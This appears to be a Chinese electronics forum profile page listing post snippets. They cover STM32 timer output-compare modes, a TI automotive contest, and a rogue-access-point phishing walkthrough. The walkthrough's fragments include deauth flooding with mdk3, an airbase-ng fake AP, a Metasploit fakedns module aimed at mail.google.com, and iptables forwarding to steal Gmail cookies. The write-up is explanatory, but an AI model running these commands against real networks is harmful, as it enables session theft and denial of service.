Image
Image

features

+ 关注

粉丝 1     |     主题 41     |     回帖 463

【转】STM32定时器输出比较模式中的疑惑
2019-11-14 08:50
  • ST MCU
  • 18
  • 714
  oc1ref从输出模式控制器(Output mode controller)开始,分为两路,上面一路至主模式控制器(To the maste ...  
  到底OC1REF与OC1之间有何秘密呢?我们来看下面这个图: 显然,我们只关心红色圈内的信号与方框内的寄存 ...  
  翻译如下: 000:冻结——输出比较寄存器TIMx_CCR1中的内容与计数器TIMx_CNT中的内容之间的比较对输出无影 ...  
  然后来理解输出比较的几个模式(PWM模式是输出比较模式的特例) 查看TIMx_CCMR1寄存器的OC1M域,有如下定 ...  
(活动结束)寻宝+分享大赛,探索你最care的汽车系统解决...
2019-10-11 17:15
  • 德州仪器MCU
  • 121
  • 12540
  整车系统的供电和照明系统算是相对复杂的一个部分,各个车灯的单独控制与关联控制,照明切换等,以及各个平 ...  
无线安全: 通过伪AP进行DHCP+DNS劫持的钓鱼攻击
2019-9-7 17:42
  • SimpleLink 论坛
  • 33
  • 4109
  4. 后记 除了使用DNS+XSS钓鱼攻击之外,基于伪AP的攻击还可以是SSL中间人劫持方向的 http://www.freebuf. ...  
  劫持成功 等待客户端访问GMAIL,对其发送DNS+XSS钓鱼攻击 成功获取到客户端的cookie数据 ...  
  使用MDK将客户端强制踢下线,迫使其连接到我们的伪AP上 mdk3 mon0 d -s 120 -c 1,6,11 ...  
  启动DNS msfconsole use auxiliary/server/fakedns show options set TARGETACTION FAKE set TARGETDOMAIN ...  
  Iptables流量牵引 echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -s 10.0.0.0/ ...  
  启动DHCP ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1500 route ad ...  
  启动伪AP airbase-ng mon0 -e "AirJ" -c 1  
  我们了解到以下信息 1. SSID(WiFi名称): AirJ 2. 加密方式: OPEN 3. 信道: 1  
  探测目标客户端所连接的AP,为伪AP的架设作准备 airodump-ng mon0  
  3. 攻击重现实验 至此,我们已经解决了这个攻击姿势中所涉及到的所有技术难点,我们来从头梳理、重现一遍 ...  
  这里我们使用无线DOS工具MDK3,它能够发起如下攻击: 1. Beacon Flood Mode 我们知道,Beacon(管理帧)是AP ...  
  0x5: Deauth/DOS拒绝服务攻击 至此,我们已经理清了一个伪AP钓鱼劫持的攻击过程中涉及到的技术,但是,还 ...  
  为了说明原理,我们的钓鱼页面可以这样简单的code一下 可以看到,劫持前,用户正在正常的访问GMAIL邮箱 ...  
  0x5: XSS中的同源策略 我们已经将用户访问mail.google.com的流量劫持到了我们的钓鱼页面 客户端连接上我 ...  
  要注意的是: 1. fakedns这个msf模块只会劫持我们设置的域名,在本例中是mail.google.com 2. 对于其他的非 ...  
2
3
近期访客